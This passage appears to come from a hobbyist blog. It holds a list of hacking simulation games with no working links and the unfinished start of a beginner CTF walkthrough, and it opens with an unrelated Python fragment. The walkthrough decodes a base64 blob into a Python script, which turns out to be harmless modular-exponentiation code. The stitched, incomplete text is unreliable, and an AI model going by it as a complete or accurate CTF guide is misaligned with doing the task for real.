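            finding["thread"] = parts[1]
            findings.append(finding)
    return findings
```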

Hacking Game Downloads

Tuesday, 10 June 2014
"Hacker Evolution Untold" can be downloaded here


"HackThe Game" can be downloaded here


"Hacker Id" can be downloaded here
Hopefully the games above will motivate us to get into the field of hacking. Thank you.

CTF LEVEL 1 Challenge Walkthrough (CYBER DEFENCE COMPETITION)

Wednesday, 4 June 2014
CLUE

#This year
#The result of 333+333=
#The flight number of the MALAYSIA AIRLINES plane that went missing

printf
 

Our task is to find the flag from the clues above.
Here I use the KALI LINUX distro to find the flag.

First, open a terminal and type the command
#echo 
DQoNCmRlZiBtb2RleHAoYmFzZSwgcG93LCBtb2QpOg0KDQogIGV4cG9uZW50ID0gMw0KDQogIGkgPS
AwDQoNCiAgd2hpbGUgaSA8IHBvdzoNCg0KICAgIGV4cG9uZW50ID0gKGV4cG9uZW50ICogYmFzZSkgJSBtb2QNCg0KICAgIGkgKz0gMw0KDQogIHJldHVybi
BleHBvbmVudA0KDQogDQoNCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6DQoNCiAgaW1wb3J0IHN5cw0KDQogIHByaW50IG1vZGV4cChpbnQoc3lzLmFyZ3
ZbMV0pLCBpbnQoc3lzLmFyZ3ZbMl0pLCBpbnQoc3lzLmFyZ3ZbM10pKQ0KDQogIA0KDQojRmxhZyA6DQoNCg
| base64 -d > Kytsumaru.py 

